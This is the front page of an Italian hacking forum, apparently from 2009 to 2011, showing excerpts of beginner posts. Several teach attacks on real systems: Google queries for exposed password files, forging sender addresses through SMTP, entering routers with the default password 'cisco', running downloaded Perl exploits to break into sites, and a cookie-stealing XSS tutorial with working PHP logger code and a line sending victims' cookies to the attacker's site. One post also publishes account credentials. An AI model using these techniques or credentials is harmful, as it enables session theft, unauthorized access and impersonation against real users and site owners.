Tutto il materiale presente su questo forum, è soltanto a scopo informativo/illustrativo, pertanto, dell'uso che verrà fatto del materiale qui fornito.

BlogFree

HackingInside

1 - E' vietato insultare gli altri utenti
2 - Non spammare forum che trattano argomenti come pedofilia, razzismo, ecc., e che violino il regolamento del circuito;
3 - Si può spammare SOLO nella sezione spam;
4 - Si puo' richiedere affilazione solo con blog in top 700;
5 - Si può uppare ogni ora
6 - E'severamente vietato bestemmiare, o parlare di razzismo sul blog, verrete bannati e segnalati allo staff.
7 - E' concesso fare spam di contest;
8 - Lo staff può decidere per qualsiasi motivo di cestinare i vostri post;
9 - Supportare il forum
Forum News Community

14/06/2009 Il forum riapre.

Devil C0de promosso ad amministratore.

Nuova skin.

-Il forum è ufficialmente aperto.

Il forum è quasi finito e pronto all'apertura.

-Contest ---

-Concorsi ---

 




Inserisci la tua e-mail  

1 user(s) online
F_ACTIVE
1 guests
0 members
0 Anonymous Members
[ View Complete List ]

Groups' legend:
[Founder]
[Amministratore]
[Mod]
[Blog Fans]

Last comments
17/9 7:21: openy in Impariamo ad usare C++

Statistics
F_STATS
Hacking Inside have:
16 articles, 1 comments, 50 members,
5.588 total visits, 219 visits this month,
237º in Top Blog

The newest member is moubsmymn

Most users ever online was 24 on 15/6/2009, 15:00


Tag Board

    Smilies

    Name:

     

    Calendar


    Board
    ForumTopicsRepliesLast Post Info
    C_ON

    Presentazioni

    Presentatevi solo qui.
    3211/4/2009, 13:14
    In: eccomi!
    By: Vincenzo-
    C_ON

    Spam & Affiliazioni

    Spammate e affiliatevi solo in questa sezione, per le affiliazioni dovrete essere almeno 500 in top blog, inoltre protete uppare ogni ora.
    3020/4/2011, 19:52
    In: Websecrets
    By: Darkspy
     


    B_NORM    
    view post Posted on 20/1/2011, 06:54 by: wowgoldQuote
    Pretentiously, I valid strike 60 and am really pocket on gold for the treatment of my 60 epic turf mount. I programme to toe-hold surrounding 500-1,000
    . Anyone recall of any to do so?

    Thanks
    Comments: 0 | Views: 52Last Post by: wowgold (20/1/2011, 06:54)
     

    B_NORM    
    view post Posted on 14/6/2009, 21:31 by: Rud.Quote
    accountid=9624130
    password=RRQhHvES

    Verrano postati premium rapidshare, per richiederli rispondere al thread.
    Comments: 0 | Views: 231Last Post by: Rud. (14/6/2009, 21:31)
     

    B_NORM    
    view post Posted on 15/4/2009, 09:29 by: Vincenzo-Quote
    Impariamo ad usare Dev c++ e facciamo un nuovo progetto.

    Questa è la finestra inziale del progr.

    http://img133.imageshack.us/img133/785/immagine1vh7.jpg

    Per creare un nuovo progetto bisogna
    Cliccare su File > Nuovo > Progetto
    e appare questa finestra:

    http://img119.imageshack.us/img119/4893/immagine2hf1.jpg

    Scegliete Console Application e C come possiamo vedere nell'immagine. Ora selezione programma predefinito e premete su ok
    http://img185.imageshack.us/img185/269/immagine3kn4.jpg

    Scrivete il nome del progetto e salvate.

    Il progetto si apre automaticamente:

    http://img368.imageshack.us/img368/5576/immagine4ii1.jpp


    In questa finestra (main.c) scriveremo il nostro programma.

    Nelle prime due righe vedete #include<file.h>

    La include indica al preprocessore di includere alcune librerie prima di compilare il progetto.

    Queste librerie standard sono usate per implementare operazioni comuni, per esempio stdio.h (libreria standard di input e output)

    standard input= tastiera, mouse
    standard output= schermo

    Esempio: La libreria stdio.h implementa operazioni di input e output.
    Includendo questa libreria prima del main nel programma possiamo inserire i dati da tastiera (std input) e stamparli su video (std output).


    All'interno di main.c trovate alcune right già scritte. In altri programmi il file.c si apre vuoto. Nel main.c scriveremo il nostro programma, in particolare, tra le due parentesi graffe {} e prima di system("PAUSE"); .

    Il programma Hello World
    "Hello World" è infatti la scritta stampata a video dal primo programma di esempio scritto in linguaggio C all'inizio del famoso libro "Programmare in C" di Brian Kernighan e Dennis Ritchie

    Wikipedia


    Il programma semplicemente stampa a video questa frase.

    Dentro le parentesi graffe scriviamo la seguente istruzione, senza dichiarare variabili di nessun tipo.

    printf("Hello World!");

    Attenzione: Il carattere ';' indica la fine dell'istruzione. Se non la scrivete avrete un errore nella compilazione!

    http://img520.imageshack.us/img520/1046/immagine4bj4.png

    Quando finite di scrivere il programma, lo compilate.
    Per compilarlo (creare il file eseguibile scritto nel linguaggio a basso l...

    Read the whole post...

    Comments: 1 | Views: 230Last Post by: openy (17/9/2011, 07:21)
     

    B_NORM    
    view post Posted on 11/4/2009, 22:39 by: Vincenzo-Quote
    Vi auguro una buona pasqua a tutti.
    Auguri!
    Comments: 0 | Views: 131Last Post by: Vincenzo- (11/4/2009, 22:39)
     

    B_NORM    
    view post Posted on 10/4/2009, 17:01 by: Vincenzo-Quote
    image

    Restando sempre in tema google...

    Ormai tutti conoscono l’immenso “colosso” dei motori di ricerca: Google. Infatti è stato stimato che google effettua piu di 2.000.000 di ricerche giornaliere, e questo fa di lui, il motore di ricerca numero uno nel mondo.
    I naviganti del web, spesso utilizzano solo il 5% delle immense potenzialita di Google limitandosi a normali ricerche, traduzioni on-line, o alla ricerca di immagini.Google è molto piu di questo, percio sotto vengono riportate tutte le potenzialita e i servizi che si possono sfruttare in Google.

    Iniziamo con delle “query” che se inserite in google ci possono aiutare nelle nostre riceche:

    Inserendo la Query

    “allinurl” e “inurl”

    Google cercherà all’interno del suo database tutti i siti che hanno nell’url la parola da voi richiesta

    ES: Allinurl:’kinglion.php’ Google cercherà tutte le pagine chiamate kiamate kinglion.php

    Inserendo la Query

    “allintitle” e “intitle”

    Google cercherà all’interno del suo database tutte le parole nel titolo, corrispondenti alla ricerca

    ES: Allintitle:’Eurohacker’ Google cercherà tutti i titoli che includono la parola eurohackers.

    Inserendo la Query

    intitle:”Index of” pwd.db

    Google cercherà all’interno del suo database tutti i siti in cui e presente il file pwd.db

    Inserendo la Query

    “Index of /root”

    Google cercherà all’interno del suo database tutte le cartelle chiamate root.

    Inserendo la Query

    “Index of /admin”

    Google cercherà all’interno del suo database le pagine index delle cartelle admin.

    Inserendo la Query

    “Index of /password”

    Google cercherà all’interno del suo database le cartelle password

    Inserendo la Query

    “Index of /” +passwd.txt

    Google cercherà all’interno del suo database tutti i file passwd.txt

    Inserendo la Query

    “filetype”

    Google cercherà all’interno del suo database tutti i siti che hanno un file con quella estenzione

    ES: “filetype:pdf” Google cercherà tutti i file pdf.

    Google non si limita ad un motore di ricerca, ma ha anche una enorme quantita di sotto-domini:

    http://www.google.com/intl/xx-hacker/

    Google Hacker

    http://moon.google.com/

    Visualizzazione Luna da satellite

    http://www.google.com/mars/

    Visualizzazione Marte da satellite

    http://earth.google.com/

    Visualizzazione la Terra da satellite

    http://code.google.com/<...

    Read the whole post...

    Comments: 0 | Views: 238Last Post by: Vincenzo- (10/4/2009, 17:01)
     

    B_NORM    
    view post Posted on 10/4/2009, 16:54 by: Vincenzo-Quote
    Nonostante sia vecchissimo, nonostante non serve a nulla, nonostante non c'entra quasi nulla con l'hacking lo posto lo stesso...

    CODICE
    javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images ; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math. sin(R*x1+ i*x2+x3)* x4+x5; DIS.top=Math. cos(R*y1+ i*y2+y3)* y4+y5}R++ }setInterval('A()',5); void(0)

    Le immaggini incomincieranno a roteare, questo è un piccolo diciamo "bug" google, fatto in codice javascript.
    Comments: 0 | Views: 104Last Post by: Vincenzo- (10/4/2009, 16:54)
     

    B_NORM    
    view post Posted on 10/4/2009, 14:14 by: Vincenzo-Quote
    image
    TELNET E SMTP
    ~~~~~~~~~~~~~
    Supponiamo di voler, per un motivo qualsiasi, inviare una e-mail a qualcuno
    facendo sembrare che essa sia stata mandata da qualcun altro.

    Il metodo piu` semplice e` utilizzare uno dei siti per hackers che offrono la
    possibilita` di inviare FakeMail (basta cercare questa parola in un motore di
    ricerca su Internet, ad esempio www.yahoo.com ha una sezione apposita per
    FakeMail e posta anonima).

    Ma per ora tralasciamo i siti e vediamo in pratica come funziona la tecnica
    delle FakeMail (che tra l'altro e` applicabile, in modo diverso, anche alle
    news).

    Il motivo per cui la studieremo e` che provandone il funzionamento, ne
    approfitteremo per imparare ad utilizzare Telnet e soprattutto SMTP, ovvero
    il servizio della posta in uscita.
    Questa e` infatti la base per capire come funzionano molte delle tecniche
    piu` utilizzate, e vi permettera`, quando sarete padroni della materia, di
    implementarne di nuove.

    Iniziamo dunque imparando ad usare Telnet.

    Usandolo per collegarvi a un sito semplicemente inserendo un host name, vi
    collegherete al servizio Telnet. Ma abbiamo detto che non e` questo il
    nostro obiettivo. A noi interessa il servizio SMTP. Dunque, come fare per
    accedervi?

    Bisognera` inserire, oltre all'indirizzo del server a cui vogliamo
    collegarci, anche un numero di "porta". Ma cos'e` una porta?
    Se riflettete, ogni server ha un unico indirizzo "centrale" (nome.com) ma
    gestisce molti servizi (web, ftp, posta...). Di conseguenza dovrebbe avere
    altrettanti server su altrettanti indirizzi diversi.

    Per evitare un proliferare di indirizzi inutili esistono le porte, in pratica
    nient'altro numeri a cui sono associati i vari servizi.
    Vogliamo collegarci a SMTP? Basta utilizzare la porta 25. Ci interessano
    le news? La porta e` 119. Oppure FTP, porta 21... sono tutti numeri "fissi"
    (standard) e quindi, tranne in rarissimi casi, collegandosi - per esempio -
    alla porta 25 ci rispondera` sempre SMTP.

    NOTA: se avete Winsock potete leggere il file "services", contenente i numeri
    delle porte piu` usate. Il file si trovera` nella directory di Winsock.

    Ora che abbiamo chiarito il discorso delle porte, supponiamo di volerci
    collegare a SMTP usando Telnet. Scegliamo un server qualsiasi (sono davvero
    rari i casi in cui un server non gestisca la posta) e, in base al programma
    usato, dovremmo operare differentemente.
    La maggior parte di essi funziona in questo modo: per collegarsi a SMTP del
    server prova.it bisogna inserire prova.it:25 come nome del server.
    Alcuni invece non prevedono l'uso dei due punti per delimitare nome e porta,
    ma hanno...

    Read the whole post...

    Comments: 0 | Views: 875Last Post by: Vincenzo- (10/4/2009, 14:14)
     

    B_NORM    
    view post Posted on 9/4/2009, 19:39 by: Vincenzo-Quote
    Che cos'è telnet?

    Telnet ( start-esegui-telnet-ok ) è un programma presente nelle distribuzioni di Windows XP e Vista. Questo può essere utilizzato come chat, per mandare email anonime e tante altre cose molto interessanti. Telnet è un protocollo client-server basato su TCP; i client solitamente si connettono alla porta 23 ( ma questa può essere cambiata ).


    Attacco con Telnet

    Avviamo Telnet ( start-esegui-telnet-ok ) e premiamo la lettera "o", quindi adesso immettiamo l'IP (per esempio: 85.39.5.10) se la porta 23 è aperta siete dentro al router!!! ci chiede una password per entrare nel computer, quale? proviamo con la password di default "cisco" ed eccoci dentro. Ovviamente questo esempio lo ho fatto non solo per farvi vedere la falla ma anche per farvi capire che le password non sono sempre scelte in modo appropriato.

    NON LAMERATE CON QUESTA GUIDA.

    Edited by Vincenzo- - 10/4/2009, 15:14
    Comments: 0 | Views: 495Last Post by: Vincenzo- (9/4/2009, 19:39)
     

    B_NORM    
    view post Posted on 8/4/2009, 16:35 by: Vincenzo-Quote
    Come usare un exploit

    ---------------------------------------------------------------
    / GUIDA PER GLI HACKER ALLE PRIME ARMI : COME USARE UN'EXPLOIT /
    ---------------------------------------------------------------
    ________________________________________________________

    INTRODUZIONE:
    ________________________________________________________

    In questa guida vi spiegherò come utilizzare un'exploit.
    Dunque, innanzi tutto per poter eseguire un'exploit in perl dovete scaricare ed installare il Plug-in per Windows,
    chiamato Active Perl. Bene dopo averlo scaricato ed installato , scegliamo l'exploit che ci serve , notate bene che
    gli exploit li troverete sempre sotto forma di testo , quindi per poterli eseguire dovrete creare voi il file
    con estensione
    ".pl" ovvero "perl".

    --------------------------------------------------------------------------------------------

    ________________________________________________________

    INIZIAMO:
    ________________________________________________________

    Allora scegliete l'exploit che vi serve per Hackerare un sito ,
    notate bene che ci sono piu exploit per ogni versione di "piattaforma" (esempio di piattaforma : Invision Power Board v2.1.6)
    Dunque supponiamo che vogliamo hackerare un sito con piattaforma invision powerboard V(versione)2.1.6 , dovremo trovare
    non solo l'exploit per IPB ma anche l'exploit che vada bene per quella versione.
    Un buon sito che vi consiglio per gli exploit è http://www.milw0rm.com.
    Dunque trovate l'exploit della versione giusta ,
    copiatelo ed incollatelo nel blocco note per poi salvarlo come (esempio) "exploit.pl" dove "pl" sta per perl.

    --------------------------------------------------------------------------------------------

    _______________________________________________________

    COME ESEGUIRLO:
    _______________________________________________________

    Dunque ora che abbiamo salvato il nostro exploit come "exploit.pl" , vi spiegherò come eseguirlo ,
    ovvero farlo funzionare.
    Allora , per eseguirlo dovremo usare il prompt dei comandi (CMD) per aprirlo ->START->ESEGUI->Scrivete cmd e fate invio.
    Aperto il cmd , per eseguire il nostro exploit dovremo prima indicare il percorso dove si trova,
    quindi iniziamo scrivendo :
    cd(questo comando va scritto sempre per prima cosa)_(il trattino basso sta per uno spazio vuoto , voi nn dovrete mettere un
    trattino ma bensì uno spazio normale)(ora il percorso del vostro exploit,il mio è un'esempio)C:\Documents and Settings\nome del vostro account windows\Desktop\
    Dovrebbe risultare scritto cosi:
    cd C:\Documents and Settings\P...

    Read the whole post...

    Comments: 0 | Views: 436Last Post by: Vincenzo- (8/4/2009, 16:35)
     

    B_NORM    
    view post Posted on 8/4/2009, 11:19 by: Vincenzo-Quote
    Cookie Grabber.

    Allora, per effettuare questo attacco è necessario sapere che, nel javascript, è presente una proprietà (document.cookie), che restituisce i nostri cookie. Ad esempio, inserendo nel sito buggato
    CODICE
    <script>alert(document.cookie)</script>

    vedremmo un alert con i nostri cookie di quel sito...Come possiamo sfruttarla per effettuare un attacco cookie stealing? Semplice, ma ci servirà una conoscenza basilare del php...il php è un linguaggio dinamico interpretato; al contrario del javascript, in esso, è il server ad eseguire i comandi e non il nostro browser (server-side).
    Vediamo ora un esempio di pagina in php con la funzione di loggare i cookie del visitatore.

    CODICE
    <?php
     $filename = "cookie.txt";
     if (isset($_GET["cookie"]))
     {
       if (!$handle = fopen($filename, 'a'))
       {
         echo "Errore: impossibile scrivere il file";
         exit;
       }
       else
       {
         if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
         {
           echo "Errore durante la scrittura";
           exit;
         }
       }
       echo "Scrittura effettuata con successo =D";
       fclose($handle);
       exit;
     }
     echo "Niente da scrivere";
     exit;
     ?>
    PS. Bene, mettendo caso che questo file si chiami log.php redirettando un utente su 'www.nostrosito.com/log.php?cookie='+escape(document.cookie) si creerebbe www.nostrosito.com/cookie.txt contenente i cookie della nostra vittima del sito da cui sfruttiamo l'xss.

    Ma che cos'è un xss
    l'xss, è un attacco fatto direttamente dal browser (grazie a questo possiamo usare il cookie grabber).

    Per vedere se un sito è vulnerabile basta usare:
    CODICE
    <script>alert("Hello World")</script>

    Se appare l'alert il sito è vulnerabile, se no, no.
    Ma come aggirare tale sistema?

    Read the whole post...
    Comments: 0 | Views: 1899Last Post by: Vincenzo- (8/4/2009, 11:19)
     

    Search:

     



    skin developed by akenord - ffThemes
    INSERISCI QUI IL TITOLO presenta... Dhtml
    E QUI IL TESTO....
    E QUI IL TESTO....
    E QUI IL TESTO....
    E QUI IL TESTO....
    E QUI IL TESTO....
    Affiliazioni